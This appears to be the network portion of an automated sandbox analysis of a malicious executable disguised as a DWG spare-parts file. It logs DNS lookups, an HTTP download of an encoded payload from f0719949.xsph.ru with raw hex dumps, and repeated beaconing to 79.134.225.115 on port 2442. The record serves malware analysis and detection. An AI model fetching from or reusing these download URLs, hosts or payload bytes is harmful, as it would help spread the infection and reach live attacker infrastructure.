                                                              Sep 16, 2022 17:08:58.610757113 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.675745964 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675774097 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675791025 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675802946 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675818920 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675837040 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675853968 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675906897 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675925016 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.675949097 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675959110 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.675968885 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.675978899 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676007032 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676024914 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676040888 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676074028 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676079988 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676090956 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676109076 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676120043 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676141977 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676172018 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676362991 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676379919 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676397085 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676414967 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676431894 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676449060 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676464081 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676474094 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676481962 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676501036 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676517963 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676534891 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676544905 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676552057 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676563025 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676568985 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676582098 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676588058 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676604986 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676621914 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676632881 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676639080 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676676989 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676677942 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676695108 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676712036 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676716089 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676728964 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676748991 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676765919 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676775932 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676783085 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676800013 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.676810026 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676843882 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.676876068 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.677110910 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677151918 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677170038 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677186966 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677191019 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.677203894 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677221060 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677221060 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.677237034 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677253962 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677259922 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.677270889 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677289009 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677305937 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677333117 CEST8049732141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:58.677335024 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.677350998 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.677387953 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:58.677428007 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:09:01.050060987 CEST4973280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:09:05.626526117 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:09:05.862689972 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:09:06.397456884 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:09:06.625747919 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:09:36.079011917 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:09:36.082273006 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:09:36.313313961 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:10:06.548556089 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:10:06.565381050 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:10:06.797723055 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:10:25.623044014 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:10:25.931941986 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:10:26.541480064 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:10:27.744868994 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:10:30.151113987 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:10:34.964055061 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:10:37.016547918 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:10:37.017326117 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:10:37.250927925 CEST24424972579.134.225.115192.168.2.7

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 16, 2022 17:08:30.572138071 CEST6117853192.168.2.78.8.8.8
                                                              Sep 16, 2022 17:08:30.594722033 CEST53611788.8.8.8192.168.2.7
                                                              Sep 16, 2022 17:08:34.632035017 CEST5333653192.168.2.78.8.8.8
                                                              Sep 16, 2022 17:08:34.653458118 CEST53533368.8.8.8192.168.2.7
                                                              Sep 16, 2022 17:08:35.654151917 CEST5100753192.168.2.78.8.8.8
                                                              Sep 16, 2022 17:08:35.672265053 CEST53510078.8.8.8192.168.2.7
                                                              Sep 16, 2022 17:08:49.704793930 CEST5051353192.168.2.78.8.8.8
                                                              Sep 16, 2022 17:08:49.724684954 CEST53505138.8.8.8192.168.2.7
                                                              Sep 16, 2022 17:08:58.028836966 CEST5828353192.168.2.78.8.8.8
                                                              Sep 16, 2022 17:08:58.050692081 CEST53582838.8.8.8192.168.2.7

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Sep 16, 2022 17:08:30.572138071 CEST192.168.2.78.8.8.80x99cfStandard query (0)f0719949.xsph.ruA (IP address)IN (0x0001)false
                                                              Sep 16, 2022 17:08:34.632035017 CEST192.168.2.78.8.8.80x97caStandard query (0)bestsuccess.ddns.netA (IP address)IN (0x0001)false
                                                              Sep 16, 2022 17:08:35.654151917 CEST192.168.2.78.8.8.80x2d01Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                              Sep 16, 2022 17:08:49.704793930 CEST192.168.2.78.8.8.80x5f2aStandard query (0)f0719949.xsph.ruA (IP address)IN (0x0001)false
                                                              Sep 16, 2022 17:08:58.028836966 CEST192.168.2.78.8.8.80xc85eStandard query (0)f0719949.xsph.ruA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Sep 16, 2022 17:08:30.594722033 CEST8.8.8.8192.168.2.70x99cfNo error (0)f0719949.xsph.ru141.8.192.151A (IP address)IN (0x0001)false
                                                              Sep 16, 2022 17:08:34.653458118 CEST8.8.8.8192.168.2.70x97caNo error (0)bestsuccess.ddns.net79.134.225.115A (IP address)IN (0x0001)false
                                                              Sep 16, 2022 17:08:35.672265053 CEST8.8.8.8192.168.2.70x2d01No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                              Sep 16, 2022 17:08:49.724684954 CEST8.8.8.8192.168.2.70x5f2aNo error (0)f0719949.xsph.ru141.8.192.151A (IP address)IN (0x0001)false
                                                              Sep 16, 2022 17:08:58.050692081 CEST8.8.8.8192.168.2.70xc85eNo error (0)f0719949.xsph.ru141.8.192.151A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • f0719949.xsph.ru
                                                              • geoplugin.net

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.749721141.8.192.15180C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Sep 16, 2022 17:08:30.690772057 CEST93OUTGET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: lVali
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:30.752866983 CEST95INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:30 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes
                                                              Data Raw: 10 0a 59 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 ee cf ea 5a 60 62 66 72 76 74 68 76 c5 c5 a7 bb 5f b1 b5 68 72 bb bd 6e 93 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 68 ab 70 6a 68 c7 a0 bf 62 0a b5 e9 24 10 b9 41 f3 77 98 20 73 69 88 7d 32 7d 86 77 e3 71 96 cf d5 22 1c 79 7f 82 cd cd 98 32 24 1c 96 34 2e 7a 97 ee cb 86 7f 79 e1 c7 4c ab ad bd 22 bd 6e 78 64 70 6a 76 a5 0c a4 32 60 ef f5 7d 5e f3 e7 79 b1 9e b8 20 57 7c 92 32 66 eb e9 28 5d 8a 24 36 00 ac a6 85 10 90 69 79 b3 f7 b6 77 b3 06 84 67 c5 b2 f9 30 31 1a a7 36 74 eb b8 32 fc 31 9a 20 8c e7 e9 73 5b ee ae 1a 93 e7 eb 69 4f 27 eb 73 22 aa ae 1c c5 47 44 34 b1 f3 b6 1e 70 9e e7 1e 3e e7 f3 6b 4d dc a0 7f 92 ac e9 77 02 45 95 81 5a 03 9e 38 63 de a6 34 c3 aa a4 34 df 32 90 77 74 f3 05 73 b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 dd 8f bd 6e 3f 66 5a 76 76 a7 60 e5 b9 6c 62 74 c3 78 bb 5a 09 76 6c 74 bb a9 5e af 66 40 72 5a c1 ab 72 6e a7 bb bd 6e 0c 2a c1 6a 76 6a 5a b1 62 d9 b9 6a 74 68 93 78 78 b7 bb a7 b1 a7 68 72 78 bd c1 76 a9 af 76 bb 74 af 66 b9 6c 62 74 c3 78 0b af a9 76 6a bb 5a 66 70 af 66 bb b9 5a 41 b7 70 5e a7 bb ad 6e 78 64 70 5a 76 5a 6a b1 62 66 72 6a 74 78 76 78 78 a7 bb a7 b1 b5 68 72 bb 7a ac 70 a9 1f 76 bb b7 af 96 74 6c 77 89 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 fe 62 bb 49 56 78 64 60 57 70 5a 8f b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 12 63 af af 5e bb b7 af 54 0c 72 62 91 c3 78 bb 5a a9 76 76 bb 5a 66 70 af d9 6a b9 0e bd b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb 3c 1a db 7f 79 bb bd 6e f4 a3 5c 76 bb a7 af a9 b9 95 a9 74 c3 6c bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a e1 b7 70 d1 3c 32 86 84 7b 8e 70 6a dc 26 b5 b1 62 d9 b9 6a 74 6b b9 78 78 52 78 a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb 3a af a9 3c 97 d9 7e 30 7a bb 5a a9 9f d5 bb 5a 66 d0 a9 66 c1 a7 5a c1 b7 ac 78 a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 a3 72 6a b4 93 7d 83 2c a7 bb a7 b1 72 68 72 bb bd 8b bb a9 af 6c bb b7 af fb bf 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 8d af 66 01 4a 92 7c 7d d3 32 a7 bb 50 74 78 64 70 e5 bb 5a 5a ad 62 66 72 9e 6a 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 8b 76 a9 52 a5 32 83 1e e5 b9 6c 62 69 3e 78 bb 5a 96 bb 76 bb 2d 66 70 af b6 b7 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 87 76 5a 97 42 6b 90 81 2a 80 68 76 04 50 a7 bb a7 61 60 68 72 3c bd 6e 76 cb 5a 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a 4c 76 76 44 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7
                                                              Data Ascii: YgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQZ`bfrvthv_hrnvlbtxZvvZfpfZpnnhpjhb$Aw si}2}wq"y2$4.zyL"nxdpjv2`}^y W|2f(]$6iywg016t21 s[iO's"GD4p>kMwEZ8c442wtsbfrjthvxxhn?fZvv`lbtxZvlt^f@rZrnn*jvjZbjthxxhrxvvtflbtxvjZfpfZAp^nxdpZvZjbfrjtxvxxhrzpvtlwxZvvZfpfZpbIVxd`WpZbfrjthvxxhrc^TrbxZvvZfpjpnnxdpjvZZbfrjthvxx<yn\vtlZvvZfpfZp<2{pj&bjtkxxRxhrnvv:<~0zZZffZxnxdpjvZZbrj},rhrllbtxZvvZffJ|}2PtxdpZZbfrjhvxxhrvR2lbi>xZv-fpZpnnxdpvZBk*hvPa`hr<nvZvlbtxZLvvDZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxx
                                                              Sep 16, 2022 17:08:30.752892971 CEST96INData Raw: bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c
                                                              Data Ascii: hrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxNr#~v(ftvz@v#GvpqVbfDv=bfnLvrq#WJxm:d^fk%,dp}V
                                                              Sep 16, 2022 17:08:30.752921104 CEST97INData Raw: c3 a9 b9 7b bf 90 87 78 23 8c b9 b7 76 c9 f3 f1 95 1f 9d c1 21 06 98 76 70 79 80 df 91 6e d0 4a 60 c3 76 90 f3 26 30 7a 3e 6a cc 52 66 b9 78 dd b2 20 95 c9 4c 72 23 9b 5e b7 a9 e5 f7 2c a1 cb a5 b9 d4 30 64 6a 78 c9 f3 9e b6 09 48 5a be 79 86 a7
                                                              Data Ascii: {x#v!vpynJ`v&0z>jRfx Lr#^,0djxHZy.JpltnCk^{6Z,t vbN8v{"n\}gJ^fn9oEsn_Cd/siZSb/B&{l1LBZ|v3pz?&tp4;Vuh,
                                                              Sep 16, 2022 17:08:30.752940893 CEST99INData Raw: 27 3c 56 a1 87 b9 a7 77 5a 29 eb 0f c3 4e 6e 78 7e 29 e7 ce 4b 89 b1 62 27 c6 62 2f 99 67 6d 31 fb 94 0f f3 ab 68 72 2a cf 27 f3 11 94 a3 bb b7 00 ed 3e 42 62 91 0a b4 3c 54 a9 37 be c1 73 60 27 84 a2 46 8f 5a e2 ee 71 5e 0f 38 76 6e 78 94 cd 7e
                                                              Data Ascii: '<VwZ)Nnx~)Kb'b/gm1hr*'>Bb<T7s`'FZq^8vnx~/nf;|QNh3KUtH\I4Zl;NwXvZKdWxzwjvZkdhvxrP,3?d^^Hu5l^W1"'.A@(td94frj5<<V0~*?RH\}b/
                                                              Sep 16, 2022 17:08:30.752955914 CEST100INData Raw: b9 64 70 2b c6 3b fb f2 4e 62 dd d2 0a a9 76 78 c5 44 da aa 64 48 c0 c0 ab bd 6e d3 d0 72 8a 23 d7 70 a9 b9 7e cd 35 a6 d0 f9 b3 a9 76 2f b6 8a 92 29 bc 98 fb c5 5a 8c de 0f d6 3d c1 bd 6e 81 64 79 6a 2f ac c2 a6 60 66 72 2b aa e5 f7 81 78 5a 38
                                                              Data Ascii: dp+;NbvxDdHnr#p~5v/)Z=ndyj/`fr+xZ86nj l}b0ipvZpz?q Z8$vrvjv;Zr{tqfA'/lf"}blv/lrfrn%hdp,1FlA3Br\R-Vjvzv
                                                              Sep 16, 2022 17:08:30.752974987 CEST101INData Raw: ee c3 5a 6e ee 19 cd 41 ef 23 6e 74 76 a9 80 2f ed 1f 1c 5a 6c b9 43 ac 1b a0 c1 5a a9 b7 40 ab 3b 2f 71 bf c9 19 0a 68 c1 b7 29 8f 36 a7 cd cb aa 60 70 df 2f 25 c2 2f b1 b3 bf e5 35 a0 ce b0 6a a7 bb 88 f8 03 c0 44 70 70 bb 2f f1 07 57 c1 b7 af
                                                              Data Ascii: ZnA#ntv/ZlCZ@;/qh)6`p/%/5jDpp/Wuv4Z/"bflq )x}nnjthl%3m'-rw`nnDJpnP,n\QZyb1#h#\\`jx;^p?Zp|Z
                                                              Sep 16, 2022 17:08:30.753009081 CEST103INData Raw: ce 85 0f 62 5c e0 6c 48 8d 1a 6c a3 a3 38 6e b3 48 a3 77 78 ed 5e c1 e5 84 8c df 29 6d 36 af dc 11 90 bc 0e 6c c3 a7 3b ff ba 2f ba b7 c1 41 d5 69 60 ee 26 ee 9a 8f ed 48 b2 85 bf 8e d0 30 3d ca 34 7b f0 e7 d4 3a bc 76 c5 72 ef 8b 0f 2f a0 40 03
                                                              Data Ascii: b\lHl8nHwx^)m6l;/Ai`&H0=4{:vr/@rZZEd?pxn$0A#Hp\b}"!Zv1jv~)tko%'d)Pg)@={**5}fj8-v.!xn?l)vxEd!th
                                                              Sep 16, 2022 17:08:30.753036976 CEST104INData Raw: 3f 13 a7 b3 df f6 05 19 f0 25 74 6a 80 cb ee b8 cb 7a f9 c9 bd 81 67 62 3b ce 43 b4 ca e8 c4 b5 c3 31 b0 0f 26 1f 64 68 c7 33 ed 25 73 09 5c 62 2f 05 7a 9e d5 94 94 43 76 e2 1f 23 08 d6 c3 c3 da f7 be a5 cc b3 74 e0 2b 20 a7 29 be 0f 97 c6 bb c5
                                                              Data Ascii: ?%tjzgb;C1&dh3%s\b/zCv#t+ )+fr5lZ,x3%\j~z51lnn;tltnEhZmk^5Uj/3n?k.j;Zn}y)(d?+Z%)pD!
                                                              Sep 16, 2022 17:08:30.753052950 CEST106INData Raw: 6e dc 37 69 6c c1 eb 35 66 9f f8 b4 c9 ca 25 0f b5 c3 31 41 36 d7 66 b2 f6 5c 87 94 25 7b 19 5c 62 37 ff ab f6 58 28 64 43 74 a1 f9 72 f1 ee 87 67 b3 31 25 36 ab 2d d8 32 e1 38 b7 df 27 f9 23 79 0f c5 b1 f4 aa 7d cf 50 c2 1e 95 bf 81 6d 88 2f a6
                                                              Data Ascii: n7il5f%1A6f\%{\b7X(dCtrg1%6-28'#y}Pm/KZd1kt5J/5i5jFht'#2);g~99dyZ#?\/\b5#\~y?!j'"'A}d#dysA?i`#h32nN8-r5P-Zfp
                                                              Sep 16, 2022 17:08:30.753086090 CEST107INData Raw: d9 80 8a 31 bf 0f 60 ca 64 68 41 79 22 28 27 3f 38 2e db 23 6a 21 5c 6c b9 69 6d e3 31 9e 86 11 a5 c6 6e a7 b3 83 2e 8f e8 f0 83 1c 92 27 8f 36 26 25 8a c8 b1 bd 2b f3 3b c2 09 41 be bf b7 35 03 0b e7 31 a7 da f7 f6 4c 79 a3 da 44 6f 96 8b ff 44
                                                              Data Ascii: 1`dhAy"('?8.#j!\lim1n.'6&%+;A51LyDoDZ)^vlb5iJ;TDzv)"<Es=+0{t}i\DogJo-3m#fi)tj+r=xd:igq3?1"6`CnFnj'^\/Ar!j'
                                                              Sep 16, 2022 17:08:30.813421011 CEST109INData Raw: dd 38 ab ce 9f b7 af a9 03 78 62 d9 76 7b 22 62 20 6a ce f3 b4 b3 bd f6 d6 d3 cb 31 07 34 5e bb 24 22 a9 d6 b8 1b bd b7 84 3b 62 f6 74 e3 b0 72 74 41 dd 69 6c 0f a9 a7 b1 b5 9a 6e bb 94 d6 6e a9 af 76 b2 96 07 cd b9 6c 62 fd 76 7b 22 66 20 5e ce
                                                              Data Ascii: 8xbv{"b j14^$";btrtAilnnvlbv{"f ^qlp`p+?fbfrjAnZT@tbt1v3h 2j\YduOrjt!d+nZ&QhrHvv.:t#Avv+wx!t)?}+b{qj3


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.749722141.8.192.15180C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Sep 16, 2022 17:08:30.824110985 CEST136OUTGET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: 53
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:30.886725903 CEST137INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:30 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes
                                                              Data Raw: 10 0a 59 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 ee cf ea 5a 60 62 66 72 76 74 68 76 c5 c5 a7 bb 5f b1 b5 68 72 bb bd 6e 93 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 68 ab 70 6a 68 c7 a0 bf 62 0a b5 e9 24 10 b9 41 f3 77 98 20 73 69 88 7d 32 7d 86 77 e3 71 96 cf d5 22 1c 79 7f 82 cd cd 98 32 24 1c 96 34 2e 7a 97 ee cb 86 7f 79 e1 c7 4c ab ad bd 22 bd 6e 78 64 70 6a 76 a5 0c a4 32 60 ef f5 7d 5e f3 e7 79 b1 9e b8 20 57 7c 92 32 66 eb e9 28 5d 8a 24 36 00 ac a6 85 10 90 69 79 b3 f7 b6 77 b3 06 84 67 c5 b2 f9 30 31 1a a7 36 74 eb b8 32 fc 31 9a 20 8c e7 e9 73 5b ee ae 1a 93 e7 eb 69 4f 27 eb 73 22 aa ae 1c c5 47 44 34 b1 f3 b6 1e 70 9e e7 1e 3e e7 f3 6b 4d dc a0 7f 92 ac e9 77 02 45 95 81 5a 03 9e 38 63 de a6 34 c3 aa a4 34 df 32 90 77 74 f3 05 73 b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 dd 8f bd 6e 3f 66 5a 76 76 a7 60 e5 b9 6c 62 74 c3 78 bb 5a 09 76 6c 74 bb a9 5e af 66 40 72 5a c1 ab 72 6e a7 bb bd 6e 0c 2a c1 6a 76 6a 5a b1 62 d9 b9 6a 74 68 93 78 78 b7 bb a7 b1 a7 68 72 78 bd c1 76 a9 af 76 bb 74 af 66 b9 6c 62 74 c3 78 0b af a9 76 6a bb 5a 66 